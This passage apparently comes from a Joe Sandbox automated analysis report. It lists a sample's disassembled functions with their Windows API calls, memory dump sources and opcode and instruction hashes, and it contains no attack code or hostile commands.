                                                                                                  • Opcode ID: ba57dc270581455cd0b81aa2e8a5d9bdacceb35699ba60719d353ca92d2626f9
                                                                                                  • Instruction ID: 6558f8e325af78fd0e3f1f125c73610e38f66160cb25f9b87a8d1a83d26238cd
                                                                                                  • Opcode Fuzzy Hash: ba57dc270581455cd0b81aa2e8a5d9bdacceb35699ba60719d353ca92d2626f9
                                                                                                  • Instruction Fuzzy Hash: 65C1B230A002549FEF19DF68C894BB97BA9AF45310F0845BAEC46DF3D6DB309984CB61
                                                                                                  Function 00903BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: d2d188e02c50826e18b4f596d73fc72d68f9037e95dda3bcddd7a9dc310aba51
                                                                                                  • Instruction ID: 24e1f40b62fd9870ee400f2a655af4ca566bf428f54bb587178e2e99d05251bb
                                                                                                  • Opcode Fuzzy Hash: d2d188e02c50826e18b4f596d73fc72d68f9037e95dda3bcddd7a9dc310aba51
                                                                                                  • Instruction Fuzzy Hash: 9E71C371540B449FDB35DB70C855AE7B7EDAF54300F40492EE6EB87281DA326684DF11
                                                                                                  Function 00908284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00908289
                                                                                                    • Part of subcall function 009013DC: __EH_prolog.LIBCMT ref: 009013E1
                                                                                                    • Part of subcall function 0090A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0090A598
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog$CloseFind
                                                                                                  • String ID:
                                                                                                  • API String ID: 2506663941-0
                                                                                                  • Opcode ID: aea9129082cb326d683de6396d7a9c117e792b942bac48baad3156dcce86baac
                                                                                                  • Instruction ID: fd1c75ce9b63b05c5240ec249da3f9fcc6f98f53b68693e716391c15cb8c7bed
                                                                                                  • Opcode Fuzzy Hash: aea9129082cb326d683de6396d7a9c117e792b942bac48baad3156dcce86baac
                                                                                                  • Instruction Fuzzy Hash: 8E419471A446589EDB20DB60CC55BEAB3BCAF80704F4404EAE18A970D3EB755EC5CB50
                                                                                                  Function 009013E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 009013E1
                                                                                                    • Part of subcall function 00905E37: __EH_prolog.LIBCMT ref: 00905E3C
                                                                                                    • Part of subcall function 0090CE40: __EH_prolog.LIBCMT ref: 0090CE45
                                                                                                    • Part of subcall function 0090B505: __EH_prolog.LIBCMT ref: 0090B50A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 61ef8cc7ee7ff625bc3d80ec3d62edf2a2c2295065f53d1ab23a2c8437810b17
                                                                                                  • Instruction ID: 30e40a04f336c2f2e6e92344bd6fe7452aaeb86d50698359ddfdc516faa90334
                                                                                                  • Opcode Fuzzy Hash: 61ef8cc7ee7ff625bc3d80ec3d62edf2a2c2295065f53d1ab23a2c8437810b17
                                                                                                  • Instruction Fuzzy Hash: B7415BB0905B449EE724CF398885AE7FBE5BF19300F50492EE5FE87292CB716694CB10
                                                                                                  Function 009013DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 009013E1
                                                                                                    • Part of subcall function 00905E37: __EH_prolog.LIBCMT ref: 00905E3C
                                                                                                    • Part of subcall function 0090CE40: __EH_prolog.LIBCMT ref: 0090CE45
                                                                                                    • Part of subcall function 0090B505: __EH_prolog.LIBCMT ref: 0090B50A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 8c3235e631f817e2f95c764b68366b40b1d4695c129f537b6e3dd3b04b53007d
                                                                                                  • Instruction ID: c68780df6e352518065d2a5850b999e088fc2809d78f3c4695730b0bbd370b19
                                                                                                  • Opcode Fuzzy Hash: 8c3235e631f817e2f95c764b68366b40b1d4695c129f537b6e3dd3b04b53007d
                                                                                                  • Instruction Fuzzy Hash: 724147B0905B449EE724DF798885AE6FBE5BF19300F50492EE5FE83282CB716694CB10
                                                                                                  Function 0091B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 0091B098
                                                                                                    • Part of subcall function 009013DC: __EH_prolog.LIBCMT ref: 009013E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 39f9937a7dc5dc102b2726b9d212c2b794f38f8ac66a06e97080e422599caec0
                                                                                                  • Instruction ID: d05c82f633e3c31233310168b11f694da44cdf9ddf2890bc2760a2034ff46e2b
                                                                                                  • Opcode Fuzzy Hash: 39f9937a7dc5dc102b2726b9d212c2b794f38f8ac66a06e97080e422599caec0
                                                                                                  • Instruction Fuzzy Hash: 78319C71D04249AFCF15DFA4D851AEEBBB8AF49300F10449EE809B7282D735AE44CBA1
                                                                                                  Function 0092AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0092ACF8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 190572456-0
                                                                                                  • Opcode ID: 99c41e50cb658954da94e400647c484ada8daa1ba3af6e8f82ea4264f02fd2a4
                                                                                                  • Instruction ID: 8963dd878e241b8a18bf653bc31c3cd64350946d83b6d2ac3a0a6bb840fa0588
                                                                                                  • Opcode Fuzzy Hash: 99c41e50cb658954da94e400647c484ada8daa1ba3af6e8f82ea4264f02fd2a4
                                                                                                  • Instruction Fuzzy Hash: 27110633A046359F9B26DE2CFC4095A739AAB843607164621FC55EB398D734EC019BD2
                                                                                                  Function 00909215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: f4e2f7759e61d644996e8515a60549f6cd6f64058ddd707a1261c7133a96a3e5
                                                                                                  • Instruction ID: 5547ab84f347831a14221e969a513c4be909df0dcc4f13de66309d98e53513c8
                                                                                                  • Opcode Fuzzy Hash: f4e2f7759e61d644996e8515a60549f6cd6f64058ddd707a1261c7133a96a3e5
                                                                                                  • Instruction Fuzzy Hash: D2016533D01568AFCF15ABACCD81ADEB776AFC8750F014515F826BB292DA348D04C6A0
                                                                                                  Function 0092C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0092B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00929813,00000001,00000364,?,00923F73,00000050,?,00941030,00000200), ref: 0092B177
                                                                                                  • _free.LIBCMT ref: 0092C4E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 614378929-0
                                                                                                  • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                  • Instruction ID: e9591bbf4c3f7a911cc378976c045c49dc24e49deb3a872e4668cadd26feb9e3
                                                                                                  • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                  • Instruction Fuzzy Hash: 000126B22003156BE3319E65A885A6AFBECEBC9330F25091DE184832C1EA30A905C724
                                                                                                  Function 0092B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00929813,00000001,00000364,?,00923F73,00000050,?,00941030,00000200), ref: 0092B177
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 2b95c73ae1def8af03eb404e813522b1849938ea0d6b8f828077dcee397b5c18
                                                                                                  • Instruction ID: 05bc4011aecc52a6b4e8b7c72620376021f5b192c6fa2ba636af49134aa09b7a
                                                                                                  • Opcode Fuzzy Hash: 2b95c73ae1def8af03eb404e813522b1849938ea0d6b8f828077dcee397b5c18
                                                                                                  • Instruction Fuzzy Hash: D1F0B43250D53567EB215B22BC16B5F77CCAB81770B18C111F808AA19ACB60D92186E0
                                                                                                  Function 00923C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00923C3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 190572456-0
                                                                                                  • Opcode ID: 93eb5694c90d58607773417cf757691489a6338c514f01c34501d9b608d206f0
                                                                                                  • Instruction ID: b47762709485a22cdd560fd8646c6cfe06cc3bf82e85f992ebf15ec67b9c10e5
                                                                                                  • Opcode Fuzzy Hash: 93eb5694c90d58607773417cf757691489a6338c514f01c34501d9b608d206f0
                                                                                                  • Instruction Fuzzy Hash: C4F0A0322142269F8F15CFA8FC00A9A77ADEF41B20710C124FE45E7194DB35DA20DB90
                                                                                                  Function 00928E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: bfd7b769b472cccbb15fa7a10d405888e3c09ea80c493a364842663e8bac6536
                                                                                                  • Instruction ID: db13766e77d2055a9a48d6781c010216cab5519308bfceb0bbbdf801a0c660d9
                                                                                                  • Opcode Fuzzy Hash: bfd7b769b472cccbb15fa7a10d405888e3c09ea80c493a364842663e8bac6536
                                                                                                  • Instruction Fuzzy Hash: 5BE06D3160B23556EB713766BC05B9B764C9F817B4F178121EC58A6099CF64CC0092E1
                                                                                                  Function 00905ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00905AC2
                                                                                                    • Part of subcall function 0090B505: __EH_prolog.LIBCMT ref: 0090B50A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 6021cd4a867922d191daa8f5eef77afa0fba1e4964eede21056369dbbc23954a
                                                                                                  • Instruction ID: 9ebc322510fc7bd14eb9adff42c20e00a62ca32301c486a418dc176904e270bd
                                                                                                  • Opcode Fuzzy Hash: 6021cd4a867922d191daa8f5eef77afa0fba1e4964eede21056369dbbc23954a
                                                                                                  • Instruction Fuzzy Hash: 2C018C30A10798DED725E7B8C0417DDFBE4AFE4304F50858DA45A53282CBB92B48DBA2
                                                                                                  Function 0090A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0090A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6C4
                                                                                                    • Part of subcall function 0090A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6F2
                                                                                                    • Part of subcall function 0090A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0090A592,000000FF,?,?), ref: 0090A6FE
                                                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0090A598
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1464966427-0
                                                                                                  • Opcode ID: df66769a3e9655ff7ee357a60ababb4996dfd7b06315e77c4c24a0fd8be2f55b
                                                                                                  • Instruction ID: f346087be27f4c4d46b48d6d71af91a9eb24401f3f37f0e416b450f6382d740a
                                                                                                  • Opcode Fuzzy Hash: df66769a3e9655ff7ee357a60ababb4996dfd7b06315e77c4c24a0fd8be2f55b
                                                                                                  • Instruction Fuzzy Hash: BFF08232009790AFCB2257B88905BCBBBA46F5A331F04CA49F1FD521D6C37950949BA3
                                                                                                  Function 00910E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00910E3D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExecutionStateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2211380416-0
                                                                                                  • Opcode ID: 63e706d3ebafb62755d596503228914007069d6bdbed42952b44e667b6260b00
                                                                                                  • Instruction ID: 08f3d010d96b5f587a03cf4a1f48138cf7ac360ab1088876ba32efcf1d393748
                                                                                                  • Opcode Fuzzy Hash: 63e706d3ebafb62755d596503228914007069d6bdbed42952b44e667b6260b00
                                                                                                  • Instruction Fuzzy Hash: F7D02B0075907C2AEF2133296816BFE260A8FC7310F0C0029F2895B1C3CF8508C2B261
                                                                                                  Function 0091A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0091A62C
                                                                                                    • Part of subcall function 0091A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0091A3DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                  • String ID:
                                                                                                  • API String ID: 1915507550-0
                                                                                                  • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                  • Instruction ID: 7f61af322a05d32bcee0ed7551dfed607f1d2844e7ddaf189d74e1e5f4948e0b
                                                                                                  • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
